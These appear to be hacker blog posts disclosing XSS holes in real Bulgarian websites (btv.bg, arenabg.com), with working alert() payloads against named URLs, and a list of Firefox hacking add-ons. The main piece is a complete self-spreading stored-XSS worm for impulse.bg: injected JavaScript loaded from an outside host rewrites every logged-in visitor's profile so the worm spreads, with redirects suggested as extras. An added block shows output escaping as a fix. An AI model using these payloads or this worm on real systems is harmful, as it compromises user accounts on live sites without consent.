new btv.bg multiple xss issues

new year, new site, new…xsses 🙂

http://www.btv.bg/horoscope/daily_horoscope.pcgi?sign_id=

“][/img][/h3][script]alert(‘nigonized’)[/script]<!—

search box xss vuln:

“][script]alert(‘nigonized’)[/script]<!—

to be continued….

ff's grand sixteen

  1. HackBar [ https://addons.mozilla.org/en-US/firefox/addon/3899 ]
  2. FireBug [ https://addons.mozilla.org/en-US/firefox/addon/1843 ]
  3. Anonymouser [ https://addons.mozilla.org/en-US/firefox/addon/1415 ]
  4. Whois [ https://addons.mozilla.org/en-US/firefox/addon/603 ]
  5. Web Developer [ https://addons.mozilla.org/en-US/firefox/addon/60 ]
  6. SwitchProxy Tool [https://addons.mozilla.org/en-US/firefox/addon/125]
  7. Foxy Proxy [ https://addons.mozilla.org/en-US/firefox/addon/2464 ]
  8. Reload Every [https://addons.mozilla.org/en-US/firefox/addon/115]
  9. User Agent Switcher [ https://addons.mozilla.org/en-US/firefox/addon/59 ]
  10. View Cookies [ https://addons.mozilla.org/en-US/firefox/addon/3587 ]
  11. Modify Headers [ https://addons.mozilla.org/en-US/firefox/addon/967 ]
  12. TiX Now! [https://addons.mozilla.org/en-US/firefox/addon/3601]
  13. Wmlbrowser [ https://addons.mozilla.org/en-US/firefox/addon/62 ]
  14. XSSMe [http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi]
  15. SQL Inject-me [http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi]
  16. Grease Monkey [https://addons.mozilla.org/en-US/firefox/addon/748]

worming impulse.bg

impulse.bg allows HTML in the “title” field, exactly like myspace.com does, with the small difference that there are no restrictions.

What immediately stands out is this:

GET /js/scriptaculous/scriptaculous.js

which by itself makes our task easier and prettier. Putting something like the following in the “Title” field:

{script src=”www.mysite.com/impulse.js”}{/script}


impulse.js contents:

var params = "name=wormy!&email=nigon.hacked.in%40gmail.com&country=1&city_id=5&" +
"city=&birthday=11&birthmonth=8&birthyear=1980&gender=1&" +
"search_gender=2&height=0&weight=0&eyes=0&hair=0&" +
"occupation=0&smoke=1&alchohol=1&title=%3Cscript%20src" +
"%3D%22http%3A%2F%2Fmysite.com/impulse.js%22%3E%3C%2Fscript%3E&" +
"info=&msg_report=1&comment_report=1&" +
"Submit=%D0%9F%D1%80%D0%BE%D0%BC%D0%B5%D0%BD%D0%B8";

var MyAjax = new Ajax.Request('/myinfo', {
method: 'post',
parameters: params
});

result:
on every visit to the “infected” profile… everyone logged into the system will also be infected… and so on forever… for effect we could change the JavaScript code by adding extras like window.location=. Creativity is the key. 😉
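As an added example (not code from the original post or from impulse.bg), this is how the profile title could have been rendered so the stored worm payload never runs: entity-encode it on output and refuse markup on input. The function names renderProfileTitle, isAcceptableTitle and the sample title are assumptions made for the example.

```javascript
// Added example, not from the original post. Output encoding for a stored
// profile "title": every character HTML treats specially is replaced by an
// entity before the value is written into the page, so a stored value such as
// the worm's <script src=...> is shown as literal text instead of executing.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical template function: the title is untrusted user input, so it
// always goes through escapeHtml() and never reaches the parser as markup.
function renderProfileTitle(title) {
  return '<h3 class="profile-title">' + escapeHtml(title) + '</h3>';
}

// Hypothetical server-side input check mirroring the restriction the post
// says is missing: a plain-text title with no markup at all, instead of a
// myspace.com-style "some HTML allowed" rule.
function isAcceptableTitle(title) {
  return typeof title === 'string' && title.length <= 80 && !/[<>]/.test(title);
}

// Constructed sample: the decoded title the worm stores via its POST to /myinfo.
const WORM_TITLE = '<script src="http://mysite.com/impulse.js"></script>';
```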

ArenaBG XSS

Nothing special…

http://arenabg.com/series.php?q=
“>’>alert(String.fromCharCode(110,105,103,111,110,105,122,101,100))